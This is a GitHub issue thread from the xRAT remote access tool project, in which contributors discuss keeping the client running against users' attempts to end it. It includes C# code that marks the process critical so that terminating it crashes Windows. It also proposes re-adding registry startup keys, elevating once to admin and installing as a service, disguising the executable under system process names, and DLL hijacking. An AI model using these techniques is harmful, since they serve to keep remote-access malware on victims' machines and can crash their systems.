### ISSUE TITLE
Persistence : Preventing users from terminating xRat process.

### ISSUE THREAD

**Issue by vigneshkarthisan** [MaxXor/xRAT#81]
Just came across some website with this snippet of code. Actually it was in C++. I made use of this with PInvoke.

Calling ```ProtectProcess()``` makes the process critical. A critical process cannot be terminated. When a user with admin rights terminates it, it either shows an alert "Access Denied" or else the system crashes causing a BSOD(Blue Screen of Death).

Not sure whether this code will work with systems running Windows 8 or later, I'm on vacation. So I couldn't get a chance to test it. 

Just call ```RevertProtection()``` to revert back to normal.

```csharp
public static class Persistence
{
    [DllImport("ntdll.dll", SetLastError = true)]
    private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);

    public static void ProtectProcess()
    {
        System.Diagnostics.Process.EnterDebugMode();
        RtlSetProcessIsCritical(1, 0, 0);
    }

    public static void RevertProtection()
    {
        RtlSetProcessIsCritical(0, 0, 0);
    }
}
```

Can be invoked from any part of code. Mr. @MaxXor  or anyone else interested, Please try this code out bcoz I don't have a PC nearby with VS2013 installed.

**Comment by yankejustin** [comment]
How does this react to the client crashing? Perhaps we should add this after fixing some of the issues that may still crash the client.   :)

**Comment by vigneshkarthisan** [comment]
Yep. What about creating a new branch and try this out ?

**Comment by yankejustin** [comment]
I am up for it. I need to get on my main computer which I can't do until later tonight. After a meeting at work, I certainly would be up to booting up a VM and seeing how stable the client is.
<u>As I just wanted to mention again (mainly for others that may try it):</u> <b>Because the client still likely has issues that cause the client to crash, this could also make these unfortunate client crashes turn into something disastrous.</b>

**Comment by vigneshkarthisan** [comment]
Which time zone do you live in?

**Comment by yankejustin** [comment]
I live in the U.S. (EDT)

**Comment by MaxXor** [comment]
We need to be sure the client is really stable before we add this.

**Comment by vigneshkarthisan** [comment]
Just make sure that this issue is not closed until we implement the feature in a separate branch.

**Comment by yankejustin** [comment]
How does this react to lower permissions? Can a client with "Normal" privileges do this?

**Comment by vigneshkarthisan** [comment]
I think it won't. But we can develop app logic to activate Persistence after the first attempt by the user to terminate the process. We can gain Admin rights one time(using the trick already implemented) and install xRAT client as a windows service so as to make sure that every time the PC boots, xRAT will be started with Admin privileges.

**Comment by electriclee** [comment]
create a seperatee branch fa ya [please] @MaxXor .

**Comment by yankejustin** [comment]
@MaxXor I messed with this a bit on a virtual machine and it gets ugly really fast. You're one mistake from blowing your arm off... I don't think we should add this...

**Comment by d3agle** [comment]
Shall we start working on solutions for persistence?

**Comment by MaxXor** [comment]
No, not with this kind of persistence. Maybe we should add a startup persistence which checks every 20min if the startup registry key has been removed and add it then again.

**Comment by rabbitsmith** [comment]
what if client.exe is terminated

**Comment by d3agle** [comment]
@MaxXor, right.  Making a process critical will be really bad for this.  I've looked into solutions for process persistence as far as making a process restart itself, etc... and it doesn't look like there will a be a good solution for this.  Start-up persistence, on the other hand, would be viable.  It wouldn't prevent users from being able to 'suspend process -> delete registry value -> terminate process' but it would be a start.

**Comment by MaxXor** [comment]
@rabbitsmith Then we can't do anything as the process stopped. :c But this form of Process protection is not so good, like @yankejustin https://github.com/MaxXor/xRAT/issues/81#issuecomment-103280791 said.

@d3agle Yes, it's a start that doesn't hurt. :)

**Comment by rabbitsmith** [comment]
what about @vigneshkarthisan 's idea of a windows service

**Comment by MaxXor** [comment]
That's possible indeed. I like this idea.

**Comment by rabbitsmith** [comment]
one drawback though. starting from win 8, task manager shows process started as a service and clicking end task would kill the service

**Comment by MaxXor** [comment]
It's okay I think. But with a Windows service xRAT starts up whenever the computer is booted, not when just when the user signs in.

**Comment by rabbitsmith** [comment]
well when you are free try renaming client.exe to something like winlogon, svchost , csrss.exe and check whether it is immune to end process

**Comment by rabbitsmith** [comment]
http://www.rohitab.com/discuss/topic/36910-process-protect/

**Comment by yankejustin** [comment]
How about basic DLL hijacking?

**Comment by Abdullah2993** [comment]
we could subscribe to UnhandledException event and then use RevertProtection() so that it doesn't effect thesystem in case of an application crash?

**Comment by yankejustin** [comment]
@Abdullah2993 I could forcibly close the Client easily by calling <code>Process.Kill()</code>. Internally, it is <i>very</i> likely that the program will consequently throw an error as a result of the termination. The above method could not effectively differentiate between accidental unhandled Exceptions in the Client and ones intended to close the program, because they really have the end result of closing the program.

**Comment by Abdullah2993** [comment]
@yankejustin we could call RevertProtection() every time we want to close the program or the program is being closed due to an unhandled exception?

**Comment by yankejustin** [comment]
@Abdullah2993 But what would we need to do so? Another program to monitor the Client? How else could we do it?

**Comment by MaxXor** [comment]
We're not going to implement this kind of persistence, but we'll add running the client as windows service.
